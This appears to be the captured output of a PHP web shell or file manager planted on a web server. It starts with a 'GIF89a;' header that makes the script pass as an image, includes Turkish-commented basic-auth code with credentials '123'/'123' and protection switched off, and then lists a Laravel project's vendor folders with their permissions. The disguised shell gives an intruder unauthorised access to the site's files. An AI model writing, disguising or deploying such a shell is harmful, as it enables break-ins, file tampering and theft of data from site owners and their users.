GIF89a; # Konfigurasyon $sayfaSifreleme ='0'; # 1 acik , 0 kapali $kullaniciAdi = '123'; $sifre = '123'; # yetki kontrol fonksiyonu function yetkiKontrol($kullaniciAdi,$sifre) { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") { header('WWW-Authenticate: Basic realm="x"'); die(header('HTTP/1.0 401 Unauthorized')); } } # Sayfa Sifreleme aciksa if($sayfaSifreleme =='1') { # Veri ve sifre kontrolu yetkiKontrol($kullaniciAdi,$sifre); } ?>
| Name | Size | Modified | Perms | Actions | |
|---|---|---|---|---|---|
| bin | --- | October 04 2025 06:34:08. | 0755 | ||
| brick | --- | October 04 2025 06:34:08. | 0755 | ||
| composer | --- | October 04 2025 06:34:08. | 0755 | ||
| dflydev | --- | October 04 2025 06:34:08. | 0755 | ||
| doctrine | --- | October 04 2025 06:34:08. | 0755 | ||
| dragonmantank | --- | October 04 2025 06:34:08. | 0755 | ||
| egulias | --- | October 04 2025 06:34:08. | 0755 | ||
| ezyang | --- | October 04 2025 06:34:08. | 0755 | ||
| fakerphp | --- | October 04 2025 06:34:08. | 0755 | ||
| filp | --- | October 04 2025 06:34:09. | 0755 | ||
| fruitcake | --- | October 04 2025 06:34:09. | 0755 | ||
| graham-campbell | --- | October 04 2025 06:34:09. | 0755 | ||
| guzzlehttp | --- | October 04 2025 06:34:09. | 0755 | ||
| hamcrest | --- | October 04 2025 06:34:09. | 0755 | ||
| laravel | --- | October 04 2025 06:34:09. | 0755 | ||
| league | --- | October 04 2025 06:34:09. | 0755 | ||
| maatwebsite | --- | October 04 2025 06:34:09. | 0755 | ||
| maennchen | --- | October 04 2025 06:34:09. | 0755 | ||
| markbaker | --- | October 04 2025 06:34:09. | 0755 | ||
| mockery | --- | October 04 2025 06:34:09. | 0755 | ||
| monolog | --- | October 04 2025 06:34:09. | 0755 | ||
| myclabs | --- | October 04 2025 06:34:09. | 0755 | ||
| nesbot | --- | October 04 2025 06:34:09. | 0755 | ||
| nette | --- | October 04 2025 06:34:09. | 0755 | ||
| nikic | --- | October 04 2025 06:34:09. | 0755 | ||
| nunomaduro | --- | October 04 2025 06:34:09. | 0755 | ||
| phar-io | --- | October 04 2025 06:34:09. | 0755 | ||
| phpoffice | --- | October 04 2025 06:34:09. | 0755 | ||
| phpoption | --- | October 04 2025 06:34:09. | 0755 | ||
| phpunit | --- | October 04 2025 06:34:09. | 0755 | ||
| psr | --- | October 04 2025 06:34:09. | 0755 | ||
| psy | --- | October 04 2025 06:34:09. | 0755 | ||
| ralouphie | --- | October 04 2025 06:34:09. | 0755 | ||
| ramsey | --- | October 04 2025 06:34:09. | 0755 | ||
| sebastian | --- | October 04 2025 06:34:09. | 0755 | ||
| spatie | --- | October 04 2025 06:34:09. | 0755 | ||
| symfony | --- | October 04 2025 06:34:09. | 0755 | ||
| theseer | --- | October 04 2025 06:34:09. | 0755 | ||
| tijsverkoyen | --- | October 04 2025 06:34:09. | 0755 | ||
| vlucas | --- | October 04 2025 06:34:09. | 0755 | ||
| voku | --- | October 04 2025 06:34:09. | 0755 | ||
| webmozart | --- | October 04 2025 06:34:09. | 0755 | ||
| autoload.php | 771 bytes | October 04 2025 06:34:08. | 0644 |